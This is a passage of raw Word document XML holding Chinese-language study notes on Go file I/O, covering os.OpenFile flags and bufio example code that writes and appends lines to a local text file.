        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.IsExist(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6B44D9" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CFAEC" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4772EB27" w14:textId="77777777" w:rsidR="00C9249E" w:rsidRDefault="00C9249E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5586F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAE561E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412A94CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO: os ioutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199AE5B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: http://c.biancheng.net/view/5729.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666AAF1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bufio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为缓冲区（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bufio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的读写的默认的缓冲长度是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4096</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节），所以记得写完后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一下，写入文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CCB006" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38898A68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func OpenFile(name string, flag int, perm FileMode) (file *File, err error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8F826A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8ACCB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是文件的文件名，如果不是在当前路径下运行需要加上具体路径；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是文件的处理参数，为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，根据系统的不同具体值可能有所不同，但是作用是相同的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB4DE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A48B28C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面列举了一些常用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件处理参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6629A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O_RDONLY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：只读模式打开文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24317B33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O_WRONLY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：只写模式打开文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950116C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O_RDWR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：读写模式打开文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9110F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O_APPEND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：写操作时将数据附加到文件尾部（追加）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D04875" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>O_CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果不存在将创建一个新文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678B2CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O_EXCL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> O_CREATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配合使用，文件必须不存在，否则返回一个错误；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F705DCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O_SYNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：当进行一系列写操作时，每次都要等待上次的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作完成再进行；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CB8113" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O_TRUNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果可能，在打开时清空文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E239C8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6739C794" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA6A6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1ECDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA860CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296911B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "bufio"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549A395" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15155EC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE0BA7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F96AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D23F3C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B7148" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445B126" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新文件，写入内容</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:t>句</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “http://c.biancheng.net/golang/”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A9B80D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>filePath := "e:/code/golang.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A069BDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    file, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE, 0666)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9688FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C12169E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:t>文件打开失败</w:t>
      </w:r>
      <w:r>
        <w:t>", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA9AE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65150174" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>及时关闭</w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t>句柄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5BD3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>defer file.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599E844" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C702C2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>写入文件时，使用带缓存的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *Writer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065BB263" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>write := bufio.NewWriter(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D732FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i := 0; i &lt; 5; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CC0881" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        write.WriteString("http://c.biancheng.net/golang/ \n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EE241" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EAA397" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>//Flush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>将缓存的文件真正写入到文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6292B8BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    write.Flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5FF2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB5D5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61993723" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追加</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE513B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6831BFFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F9125" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F902DC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939165D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "bufio"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BDD48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E04D16C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2F3E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B3AC53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E6C9F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDECC18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    filePath := "e:/code/golang.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57487382" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>file, err := os.OpenFile(filePath, os.O_WRONLY|os.O_APPEND, 0666)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11842450" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1571BBA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件打开失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4737A332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7C863D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及时关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
